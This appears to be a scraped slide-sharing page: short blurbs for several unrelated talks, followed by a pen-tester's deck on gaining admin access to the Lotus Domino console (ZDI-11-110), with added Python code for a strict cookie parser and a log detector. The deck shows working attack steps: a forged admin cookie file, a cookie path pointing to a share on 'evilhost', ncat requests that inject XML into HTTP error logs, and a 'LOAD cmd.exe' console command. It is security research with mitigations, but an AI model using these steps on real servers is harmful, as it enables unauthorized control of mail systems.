During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
5th LF Energy Power Grid Model Meet-up SlidesDanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
Dandelion Hashtable: beyond billion requests per second on a commodity server
Lotus Domino: Penetration Through the Controller
1. Invest in security to secure investments
Lotus Domino: Penetration Through the Controller
Alexey Sintsov
2. #whoami
• Pen-tester at ERPscan Company – Job, money and fun
• Researcher – Fun
• Writer at ][akep magazine – Self-importance
• DCG#7812 POC and fun – Community and fun
erpscan.com
ERPScan — invest in security to secure investments
3. ERPScan
• Innovative company engaged in ERP security R&D
• Part of “Digital Security”, a Russian group of companies founded in 2002
• Flagship product – ERPScan Security Scanner for SAP
• Tools: pen-testing tool, sapsploit, web.xml scanner
• Consulting services: ERP/SRM/CRM/SCADA/etc. pen-tests, SAP assessment, SAP code review
4. What do pen-testers do?
• Scanning
• Fingerprinting
• Banner grabbing
• Play with passwords
• Find vulns.
• Exploit vulns.
• Escalate privs.
• Dig in
• Find ways to make attacks
• Etc.
5. Find vulns.
• Static
  – Source code review
    • regexp
    • formal methods
    • hand testing
  – Reverse Engineering
    • formal methods
    • hands…
• Dynamic
  – Fuzzing (bin/web) + typical bugs for the class + Reverse Engineering
  – Hand testing
• Architecture Analysis (logic flaws)
• Use vuln. databases (CVE/exploit-db/etc.)
6. Pen-tester env.
Tasks:
• pwn target 8)
• show most dang. vulns. → show real attacks and what an attacker can do
Time: Not much )
Targets: Large number of targets, different types
7. Find vulns.
• Static
  – Source code review [BlackBox]
    • regexp
    • formal methods
    • hand testing
  – Reverse Engineering [Not much time]
    • formal methods
    • hands…
• Dynamic
  – Fuzzing (bin/web) + typical bugs for the class + Reverse Engineering
  – Hand testing
• Architecture Analysis (logic flaws)
• Use vuln. databases (CVE/exploit-db/etc.)
8. Bug hunting?
9. Pen-tester/Sec. researcher
Provider:
  – New attacks and methods
  – 0-day bug hunting
  – Something new…
Consumer:
  – Exploit development
  – Exploitation
10. Exploit’s life
Finding bug → Creating PoC → Creating exploit → Selling → Exploiting → Creating report
11. In real
Finding bug → Creating PoC → Creating exploit → Selling → Exploiting?
  No! → Creating report
  Yep! → Crash… → Creating report?
12. Target…
13. Let’s see some real stuff
First pen-test – Lotus Domino 8.5.2FP2
Second pen-test – Lotus Domino 8.5.3 (the latest)
Pen-tester’s actions:
• Scan and grab banners
• Detect version
How to: nmap -sV -PN -T5 -p … 0 192.168.0.13
  . . .
  Nmap scan report for targethost (192.168.0.13)
  PORT      STATE SERVICE           VERSION
  110/tcp   open  pop3              Lotus Domino POP3 server 8.5.2
  1352/tcp  open  lotusnotes        Lotus Domino server (CN=SERV;Org=Company)
  1533/tcp  open  http              Lotus Domino httpd
  2050/tcp  open  ssl/dominoconsole Lotus Domino Console (domain: domain; description: "COMPANY")
  49152/tcp open  http              Microsoft HTTP API 2.0
  MAC Address: 00:1A:1B:8A:1F:1E (Hewlett Packard)
  Service Info: OS: Windows/Longhorn/64 6.1
14. Lotus Domino 8.5.2FP2
Pen-tester’s actions:
• Search for an exploit
Known CVEs and the verdict noted against them:
• CVE-2011-0914, CVE-2011-0915 – Useless
• CVE-2011-0916 (client-side), CVE-2011-0917 – Useless
• CVE-2011-0919, CVE-2011-0920 – Useless, fixed in 8.5.2…
15. Lotus Domino 8.5.2FP2
Pen-tester’s actions:
• … more search
CVEs: CVE-2011-0914, CVE-2011-0915, CVE-2011-0916, CVE-2011-0917, CVE-2011-0919, CVE-2011-0920
Exploit availability noted against the six CVEs (as extracted, in order): Private, Private, None, PoC, None, Private
Risk noted against every CVE: DoS risk
Advisory text: “Lotus… blah-blah-blah, has many vuln. issues. Not public or stable exploits are available… Auth. issue (CWE-287), Buffer Errors (CWE-119), blah-blah-blah, please update to 8.5.2FP3 or 8.5.3”
16. No fun…
• No fun…
• Lotus server still not pwned (just in theory)
• If we could pwn it, then maybe we would get MORE
--------------------- BUT ---------------------
• We have no time for research and exploit dev. for those bugs (CWE-119)
• It is risky
• It is a pen-test and we have other targets…
--------------------- SO ----------------------
Pen-tester is not a researcher? Forget about it?
17. What do pen-testers do?
• Scanning
• Fingerprinting
• Banner grabbing
• Play with passwords
• Find vulns.
• Exploit vulns.
• Escalate privs.
• Dig in
• Find ways to make attacks
• Etc.
Annotation: We can’t do that right now → Analysis: time for research and exploit dev., resources, risks, necessity → Research → Exploit dev.
18. Lotus Domino 8.5.2FP2
Pen-tester’s actions:
• Let’s do some fast analyses… research…
CVEs: CVE-2011-0914, CVE-2011-0915, CVE-2011-0916, CVE-2011-0917, CVE-2011-0919, CVE-2011-0920
Noted against the six CVEs (as extracted, in order): Time…, Time, Time, Time, Time, ???
Risk noted against every CVE: DoS risk
19. ZDI-11-110
20. What is the protocol?
• Googling failed
• But… Patrik’s NSE scripts can help:
    socket:reconnect_ssl()
    …
    socket:send("#API\n")
    socket:send(("#UI %s,%s\n"):format(user,pass))
    socket:receive_lines(1)
    socket:send("#EXIT\n")
    …
  → SSL, then "#UI login,pass\n"
• But what about COOKIE? Service code is in dconsole.jar, so we can decompile it and get protocol descriptions…
26. Exploit for ZDI-11-110
– echo ^<user name="admin" cookie="dsecrg" address="10.10.0.1"^> > n:\domino2zdi0day_.txt
27. Mitigations…
• Privileges for system console
  – If ‘admin’ has enough privileges, he can call OS commands such as ‘$whoami’
• Service password for dangerous functions
  – If the service password is not set, then ‘admin’ can call dangerous functions such as ‘LOAD cmd.exe /c net use …’
One doesn’t exclude the other!
28. Pen-tester vs. mitigations…
• If there is a Microsoft AD network
• If Kerberos is not used
• If Lotus Domino runs as “win_domain/$LotusAcc”
29. Lotus Domino 8.5.3/8.5.2FP3 – Fix №1
\\evilhost\exploit\cookie.xml --> .\\evilhost\exploit\cookie.xml
30. Lotus Domino 8.5.3/8.5.2FP3 – Fix №2
We need the client’s cert. for auth…
31. Let’s see some real stuff
First pen-test – Lotus Domino 8.5.2FP2
Second pen-test – Lotus Domino 8.5.3 (the latest)
Pen-tester’s actions:
• Scan and grab banners
• Detect version
• OR… green line in report?
How to: nmap -sV -PN -T5 -p … 0 192.168.0.13
  . . .
  Nmap scan report for targethost (192.168.0.13)
  PORT      STATE SERVICE     VERSION
  110/tcp   open  pop3        Lotus Domino POP3 server 8.5.3
  1352/tcp  open  lotusnotes  Lotus Domino server (CN=SERV;Org=Company)
  1533/tcp  open  http        Lotus Domino httpd
  2050/tcp  open  ssl/unknown
  49152/tcp open  http        Microsoft HTTP API 2.0
  MAC Address: 00:1A:1B:8A:1F:1E (Hewlett Packard)
  Service Info: OS: Windows/Longhorn/64 6.1
33. XML?
cookie.xml:
  <?xml version="1.0" encoding="UTF-8"?>
  <user name="admin" cookie="dsecrg" address="10.10.0.1">
→ Valid
cookie2.xml.trash:
  There is a good <user xml file! and name="admin" will be found as cookie="dsecrg" and address="10.10.0.1" hooray! > and blah-blah-blah
35. XML?
cookie.xml:
  <?xml version="1.0" encoding="UTF-8"?>
  <user name="admin" cookie="dsecrg" address="10.10.0.1">
→ Valid
cookie2.xml.trash:
  There is a good <user xml file! and name="admin" will be found as cookie="dsecrg" and address="10.10.0.1" hooray! > and blah-blah-blah
→ Valid
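The contrast these slides draw between cookie.xml and cookie2.xml.trash, together with the path change behind Fix №1 on slide 29, as an added Python example (not Domino’s code and not from the talk): a lenient attribute scrape that accepts the trash file next to a strict parser that rejects it, plus a cookie-path check that refuses UNC shares, other drives and traversal. The data directory, the attribute rules and the closing slash on the well-formed sample are assumptions.

```python
import ipaddress
import ntpath
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the two files on the slides. The "/>" is added so
# that the good file is well-formed XML; the slide shows it without a closing slash.
COOKIE_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
              '<user name="admin" cookie="dsecrg" address="10.10.0.1"/>')
COOKIE_TRASH = ('There is a good <user xml file! and name="admin" will be found as '
                'cookie="dsecrg" and address="10.10.0.1" hooray! > and blah-blah-blah')

EXPECTED = {"name", "cookie", "address"}
ATTR_RE = re.compile(r'(name|cookie|address)="([^"]*)"')


def lenient_cookie(text):
    """Model of the tolerant behaviour the slides show: take whatever sits between
    '<user' and the next '>' and scrape the three attributes out of it, ignoring
    every other character. This is what lets a log file pass as a cookie file."""
    start = text.find("<user")
    end = text.find(">", start) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    attrs = dict(ATTR_RE.findall(text[start:end]))
    return attrs if EXPECTED <= attrs.keys() else None


def strict_cookie(text):
    """Hardened reading: the whole file must be one well-formed <user/> element with
    exactly the expected attributes, a plausible account name and a real IP address."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return None
    if root.tag != "user" or len(root) or (root.text or "").strip():
        return None
    if set(root.attrib) != EXPECTED:
        return None
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", root.attrib["name"]):
        return None
    try:
        ipaddress.ip_address(root.attrib["address"])
    except ValueError:
        return None
    return dict(root.attrib)


# Assumed location of the console's data directory; the real path is deployment-specific.
DATA_DIR = r"C:\Lotus\Domino\data"


def is_local_cookie_path(path, base_dir=DATA_DIR):
    """Path check in the spirit of Fix No.1: refuse UNC shares (\\\\host\\share\\...),
    other drives and '..' traversal, so the cookie file can only come from base_dir.
    ntpath gives Windows path semantics whatever host this runs on."""
    drive, _ = ntpath.splitdrive(path)
    if drive.startswith(("\\\\", "//")):
        return False
    base = ntpath.normpath(base_dir)
    full = ntpath.normpath(ntpath.join(base, path))
    try:
        return ntpath.commonpath([base, full]) == base
    except ValueError:  # different drive letters have no common path
        return False
```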
36. XML cookie Injection
nmap -sV -PN -T5 -p … 0 192.168.0.13
  . . .
  Nmap scan report for targethost (192.168.0.13)
  PORT      STATE SERVICE     VERSION
  110/tcp   open  pop3        Lotus Domino POP3 server 8.5.3
  1352/tcp  open  lotusnotes  Lotus Domino server (CN=SERV;Org=Company)
  1533/tcp  open  http        Lotus Domino httpd
  2050/tcp  open  ssl/unknown
  49152/tcp open  http        Microsoft HTTP API 2.0
  MAC Address: 00:1A:1B:8A:1F:1E (Hewlett Packard)
  Service Info: OS: Windows/Longhorn/64 6.1
37. XML cookie Injection
ncat targethost 49152
GET /<user name="admin"cookie="pass"address="111"> HTTP/1.0\r\n\r\n

c:\windows\system32\logfiles\httperr\httperr1.log:
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9 47001 - - - 400 - BadRequest -
2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 47001 HTTP/1.0 GET /<user%20name="admin"cookie="pass"address="111"> 404 - NotFound -
38. XML cookie Injection
ncat targethost 49152
GET /<user HTTP/1.0

ncat targethost 49152
GET /name="admin"cookie="pass"address="111" HTTP/1.0

c:\windows\system32\logfiles\httperr\httperr1.log:
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9 47001 - - - 400 - BadRequest -
2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 47001 HTTP/1.0 GET /<user 404 - NotFound -
2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 GET /name="admin"cookie="pass" address="111"> 404 - NotFound -
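The detection side of the two slides above, as an added Python example that is not from the talk: it parses HTTP.sys httperr records using their #Fields directive, flags request URIs that carry markup, and notices when one client’s fragments concatenate into a complete element, which is how the split requests on slide 38 end up in the log. The log lines are constructed after the slide’s output; the benign request from the 10.10.10.50 client is invented.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed HTTP.sys httperr log modelled on the slide output. Addresses and the
# three 10.10.10.101 records follow the slide; the 10.10.10.50 record is an invented
# benign request added so that the detector has something to leave alone.
SAMPLE_LOG = """#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9 47001 - - - 400 - BadRequest -
2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 47001 HTTP/1.0 GET /<user 404 - NotFound -
2011-08-22 09:19:17 10.10.10.101 46235 10.10.9.9 47001 HTTP/1.0 GET /name="admin"cookie="pass"address="111"> 404 - NotFound -
2011-08-22 09:20:01 10.10.10.50 51000 10.10.9.9 47001 HTTP/1.1 GET /wsman 404 - NotFound -
"""

# A tag opening, an XML-style attribute, or a tag close inside a request URI.
MARKUP_RE = re.compile(r'<\s*[A-Za-z]|[A-Za-z_:-]+="[^"]*"|>')
ELEMENT_RE = re.compile(r"<\s*[A-Za-z][^>]*>")


def parse_httperr(text):
    """Yield one dict per record, naming the columns from the #Fields directive.
    httperr fields are space-separated and use '-' for an empty value."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def find_xml_injection(text):
    """Return (hits, reassembled): hits lists every (client, decoded uri) carrying
    markup; reassembled maps a client to the string its fragments form when joined
    in log order, whenever that string contains a complete <...> element. The second
    check is what catches the slide-38 trick of sending '<user' and the attributes
    in separate requests so that no single log line looks like a whole element."""
    hits = []
    per_client = defaultdict(list)
    for rec in parse_httperr(text):
        uri = unquote(rec["cs-uri"])  # the %20 from slide 37 becomes a space again
        if uri != "-" and MARKUP_RE.search(uri):
            hits.append((rec["c-ip"], uri))
            per_client[rec["c-ip"]].append(uri.lstrip("/"))
    reassembled = {}
    for ip, frags in per_client.items():
        joined = " ".join(frags)
        if ELEMENT_RE.search(joined):
            reassembled[ip] = joined
    return hits, reassembled
```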
39. What about client’s cert?
dconsole.jar
43. Conclusions
• Pen-tester will get more profit if he tries to research something // thx Cap!
• Good pen-tester ∩ good security researcher
• We got 0-day 8)
To admins:
• Set filter on 2050/tcp
• Use both mitigations
  – Less privileges for console user
  – Set service password on console
44. Thank you!
a.sintsov@erpscan.com
@asintsov
erpscan.com